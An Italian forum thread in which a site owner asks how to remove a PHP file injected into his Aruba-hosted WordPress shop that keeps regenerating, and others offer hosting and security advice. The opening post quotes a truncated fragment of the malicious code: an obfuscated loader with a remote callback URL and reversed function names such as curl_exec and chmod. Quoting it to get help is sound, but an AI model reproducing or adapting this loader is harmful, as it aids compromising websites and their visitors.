- Home
- Categorie
- Coding e Sistemistica
- Hosting, Server e Domini
- [Dominio] File con permessi 444 e codice malevolo
-
[Dominio] File con permessi 444 e codice malevolo
Buongiorno a tutti,
ho un dominio su Aruba, nel ho pubblicato:- un ecommerce nella directory /shop
- un file index.php nella root che al momento fa un redirect alla cartella /shop
Da un mesetto circa il file index.php e' stato modificato (non da me) con del codice malevole con tutte le conseguenze del caso.
Il problema e' che tale file ha i permessi settati a 444, provo a modificarli e ottengo un messaggio di errore.
Ho richiesto supporto ad Aruba.it per la cancellazione, una volta cancellato viene generato nuovamente.
Stesso identico problema ce l'ho con il file .htaccessQualche suggerimento?
Qui una parte del contenuto:
<?php @'$ yumingid=47 lineid=2332 x3=index.php/ x4=ghpyxlOwbV x5=underlying,roadside,alone,ethics,smaller,hotpants,agree,jasper,horse,Baby,stick,despair,SharkFin,bulk,Apprentice,whole,plow,coconutmilk,trunklineelectrification,inspire,impossible,pantyhose,earthquake,sage,BarberShop,carrier,evidence,English,Latin,definite x6= x7=http://jnice01.ouuwtizhy573nskt/weilai0.php cache=0000 sps=111111000 urlgz=[0:3]^[0:8]-[0:6~12][1:6]/[0:8~10]!/|[0:7~10]^/[1:8]/!/[0:10~15]/|[0:8~10]^-[2:10~12]-[2:4]-[2:6]-!/|^-[2:8~12]-[2:5~10]-[0:5][1:8]/![0:3]/|^[0:10~12]/[0:1]_[2:8~12]-!/|[0:10~12]^/[0:6~12]_[1:6]-!/|[0:10~15]_[0:6~10]-^-![0:2]/|[0:10~12]-[0:1]^-[0:4]-[0:1]!-[0:10~12]/|[0:1]^-[0:3]-[0:10~12]-[0:5]-[0:5]!/|^/[0:10~12]_[1:3~5][0:4]-[0:8]-!/|^[0:5]_[1:5]_[2:12~15]_!|[0:3~5]-^-[1:10~12]-[0:10~12]/![0:2]|^[0:6~8]/[1:8~12]-!/[0:5~8]|^_[1:6~8]_[1:6~8]/[2:8~12]_[0:5~8]/!|[0:12]_^-[2:10~15]_[0:6~8]_!|[0:10~15]/^-[1:6~8]/!|^[3:6~10]/[0:1]_[2:12]_!|[0:8]/[0:6~8]/^-!/[0:8~10].php|^/[2:10~12]/[1:8~10]-!-[0:3].jp|^_[1:6~8]/[1:6~8]_[0:10~12][1:5]/!.jp|[0:3]^[0:3]-[2:8]-[1:5][0:3]-[2:6]-[0:6][1:4]/[0:2]!.html|[0:8~10]/^-!/[0:15~18].html|[0:6~8]/[0:15~18]/^-!.html ';$bbb6b6b66=explode("1l","tilps_gerp1ledocnelru1lemaner1lyarra_ni1lezilairesnu1lstegf1l5dm1lcexe_lruc1lofniphp1lstnetnoc_teg_elif1lrtsbus1ldomhc1llla_hctam_gerp1ldnar_tm1lrewolotrts1lnelrts1lrhc1letad1lemit1lemitmelif1lliec1lgnol2pi1lnepof1ltroba_resu_erongi1lsehsalscdda1ldnar_yarra1llru_esrap1lenifed1ledocedlru1lemanybtsohteg1lelffuhs1lfoef1lrtrts1ltini_lruc1ltfihsnu_yarra1lftnirps1ledolpmi1lciremun_si1lhcuot1letirwf1lyarra_si1lemitotrts1ltimil_emit_tes1lredaeh1legrem_yarra1leuqinu_yarra1ltrats_bo1ltnuoc1lelif_si1lstsixe_noitcnuf1lstsixe_elif1lhctam_gerp1lecalper_gerp1leikooctes1lsoprts1lmirt1lsopirts1lrddaybtsohteg1ltcartxe1legnar1lesolcf1ldro1ledolpxe1lpop_yarra1lsoprrts1lesolc_lruc1ltpotes_lruc1lecalper_rts");foreach($bbb6b6b66 as$b6bbbbbbb=>$bbbb6b6) .....
-
Ciao
hai una falla nel sito, che Cms usi? E' tutto aggiornato? Se si ricontatta l'Hosting e chiedigli la risoluzione o identificazione del problema. Se non rispondono o identificano cambia Hosting.
-
@felino said:
Buongiorno a tutti
Ciao,
@felino said:
Qualche suggerimento?
Sì, quello di trasferirlo altrove, magari presso qualcuno che ha un filtro antimalware/antivirus sul server...
-
La fate un po facile !
qui hanno usato una vulnerabilita applicativa per accedere al file system, l'hoster puo fare dei controlli ed avere anche tool di antivirus ma se il codice e scritto male ce poco da fare, se tu scrivi un codice che permette l'upload di files non sicuro ci metto 5 minuti ad usarlo e l'hoster che fa lo blocca? L'applicazione deve essere scritta in modo corretto e sicuro altrimenti l'ISP non puo rimediare e se LO FA avrai 1000 problem perché TROPPA sicurezza vuole dire non fare funzionare 1000 cose… la risposta semplice e cambia provider e poi continua a cambiarlo, non e suo compito garantire al sicurezza applicativa.Utixo Cloud Services
-
@utixo cloud said:
se tu scrivi un codice che permette l'upload di files non sicuro ci metto 5 minuti ad usarlo e l'hoster che fa lo blocca?
Sì, siamo nel 2019, un buon application firewall può riconoscere e bloccare dei POST malevoli senza grossi problemi, sia tramite signature che tramite predizioni di tipo euristico, con basso rischio di falsi positivi.
Poi è chiaro che può sempre esserci un zeroday o qualcosa possa sfuggire al controllo ma, nel caso specifico, disponendo del codice malevolo, se è sempre lo stesso, non è che ci voglia granchè a bloccarlo...
-
@Shazan said:
Sì, siamo nel 2019, un buon application firewall può riconoscere e bloccare dei POST malevoli senza grossi problemi, sia tramite signature che tramite predizioni di tipo euristico, con basso rischio di falsi positivi.
Poi è chiaro che può sempre esserci un zeroday o qualcosa possa sfuggire al controllo ma, nel caso specifico, disponendo del codice malevolo, se è sempre lo stesso, non è che ci voglia granchè a bloccarlo...La sicurezza e' una cosa piu complessa che installare semplicemente un antivirus da pochi Euro sul server o abilitare il mod_security ... ci sono piu livelli da proteggere dal sistema operativo al layer del pannello di controllo, all'interprete PHP e anche all'applicativo ...senza entrare nel merito preciso nel caso è difficile dare un giudizio se e colpa di Aruba o no ... e questo che voglio dire ..
-
Grazie del supporto.
L'ecommerce e' realizzato tramite Wordpress + WooCommerce.
Ho preso in gestione il tutto da qualche settimana.
Il problema, secondo me, e' stato generato da una backup sul dominio stesso di una versione di Woordpress+Woocommerce abbastanza datata!Ho provveduto ad eliminare il superfluo ed aggiornare il CMS, i relativi plugin ed il theme con l'ultima versione online.
-
Se nel tuo hosting non è presente un anti-malware o anti-virus esegui una scansione con sucuri: https://sitecheck.sucuri.net/
Ciao.
-
Ecco qui il risultato della scansione:
Outdated Software Detected PHP under 5.6.40 Vulnerabilities on PHP 5.6
Outdated Software Detected WordPress under 5.1.1/5.0.4/4.9.10Ovviamente sto gia' provvedendo all'aggiornamento di entrambi.
Grazie per avermi segnalato questo tool.
Security Updates
-
Ho eliminato i post di utixo cloud e francois. A quest'ultimo è stata data la possibilità di scegliere tra chiedere scusa per il modo in cui ha risposto oppure di presentare le dimissioni come moderatore. Si è dimesso.
Vi prego di continuare con la discussione e di stare tranquilli, non c'è bisogno di alzare i toni per discutere civilmente.
Se avete dubbi io in privato ci sono sempre.
Altrimenti la prossima volta vi allontaniamo dal forum, ci sono tanti altri luoghi su Internet dove arrabbiarsi e insultarsi. Non da noi